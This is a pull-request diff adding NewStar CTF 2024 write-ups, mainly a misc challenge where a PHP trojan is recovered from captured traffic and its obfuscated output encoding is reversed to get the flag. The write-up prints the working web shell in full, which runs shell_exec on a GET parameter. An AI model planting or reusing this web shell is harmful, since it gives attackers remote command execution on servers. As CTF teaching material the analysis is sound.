Update week2 wp #26

Merged
merged 12 commits into from
Oct 15, 2024
59 changes: 59 additions & 0 deletions docs/wp/2024/week2/misc/herta.md
@@ -0,0 +1,59 @@
---
titleTemplate: ':title | WriteUp - NewStar CTF 2024'
---
<script setup>
import Container from '@/components/docs/Container.vue'
</script>

# Herta's Study

<Container type='tip'>
本题考点:PHP 混淆,流量分析
</Container>

建议配合 unknown 师傅的前两道流量题食用

第七条流量是上传的 PHP 木马

```php
<?php
$payload=$_GET['payload'];
$payload=shell_exec($payload);
$bbb=create_function(
base64_decode('J'.str_rot13('T').'5z'),
base64_decode('JG5zPWJhc2U2NF9lbmNvZGUoJG5zKTsNCmZvcigkaT0wOyRpPHN0cmxlbigkbnMpOyRp
Kz0xKXsNCiAgICBpZigkaSUy'.str_rot13('CG0kXKfAPvNtVPNtVPNtWT5mJlEcKG1m').'dHJfcm90MTMoJG5zWyRpXSk7DQo
gICAgfQ0KfQ0KcmV0dXJuICRuczs==')
);
echo $bbb($payload);
?>
```

可以搜索一下 `create_funtion()` 函数,解除混淆后得到加密代码

```php
$ns = base64_encode($ns);
for ($i = 0; $i < strlen($ns); $i += 1){
if ($i % 2 == 1) {
$ns[$i] = str_rot13($ns[$i]);
}
}
return $ns;
```

就是 Base64 后把奇数位 ROT13

解码反过来就行(第38条,`f.txt` 里的是真 flag,另一个是假 flag)

```php
<?php
$ns = 'ZzxuZ3tmSQNsaGRsUmBsNzVOdKQkZaVZLa0tCt==';
for ($i = 0; $i < strlen($ns); $i += 1){
if ($i % 2 == 1) {
$ns[$i] = str_rot13($ns[$i]);
}
}
echo base64_decode($ns);
// flag{sH3_i4_S0_6eAut1fuL.}
?>
```
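Review bot: The function name in the sentence following the trojan listing is misspelled as `create_funtion()`; it should be `create_function()`, since the text tells readers to search for it. It would also help to show the de-obfuscation step rather than only its result: the first argument `'J'.str_rot13('T').'5z'` evaluates to `JG5z`, which Base64-decodes to `$ns`, so the lambda's parameter is the `$ns` used in the recovered body. The recovered body and the decoder have no indentation inside their `for`/`if` blocks, and one sentence noting that ROT13 is its own inverse would explain why the decoder reuses the same loop before calling `base64_decode`.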
8 changes: 4 additions & 4 deletions docs/wp/2024/week2/web/pangbai2.md
Expand Up @@ -58,11 +58,11 @@ git stash list

- `git stash`

保存当前工作进度,会把暂存区和工作区的改动保存起来。执行完这个命令后,在运行 `git status` 命令,就会发现当前是一个干净的工作区,没有任何改动。使用 `git stash save ``'一些信息``'` 可以添加一些注释。
保存当前工作进度,会把暂存区和工作区的改动保存起来。执行完这个命令后,在运行 `git status` 命令,就会发现当前是一个干净的工作区,没有任何改动。使用 `git stash save '一些信息'` 可以添加一些注释。

- `git stash pop [index] [stash_id]`
- `git stash pop [-index] [stash_id]`

从 Stash 中释放内容,默认为恢复最新的内容到工作区。
从 Stash 中释放内容,默认为恢复最新的内容到工作区。

:::

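Review bot: The new `git stash pop [-index] [stash_id]` line writes the option with a single dash, but git spells it `--index`; suggest `git stash pop [--index] [<stash>]` so the synopsis can be typed as written. In the paragraph above it, `git stash save '一些信息'` is now quoted correctly, but `git stash save` is deprecated in favour of `git stash push -m '一些信息'`, which is worth mentioning while this block is being touched.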
Expand Down Expand Up @@ -120,7 +120,7 @@ $_GET['NewStar_CTF.2024'] !== 'Welcome' && preg_match('/^Welcome$/', $_GET['NewS
如果加 `D` 修饰符,就不匹配换行符:

```python
preg_match('/^Welcome$/D',"Welcome\n")
preg_match('/^Welcome$/D', "Welcome\n")
```

:::
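Review bot: The fence around the corrected `preg_match('/^Welcome$/D', "Welcome\n")` line is still tagged `python` although the snippet is PHP; change the tag to `php` so it is highlighted correctly and matches the other PHP blocks in the write-up. Ending the statement with `;` would also make the line valid when copied as-is.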
2 changes: 2 additions & 0 deletions theme-config.yml
Expand Up @@ -194,3 +194,5 @@ sidebar:
link: /wp/2024/week2/misc/xiaoming1
- text: 用溯流仪见证伏特台风
link: /wp/2024/week2/misc/futetaifeng
- text: Herta's Study
link: /wp/2024/week2/misc/herta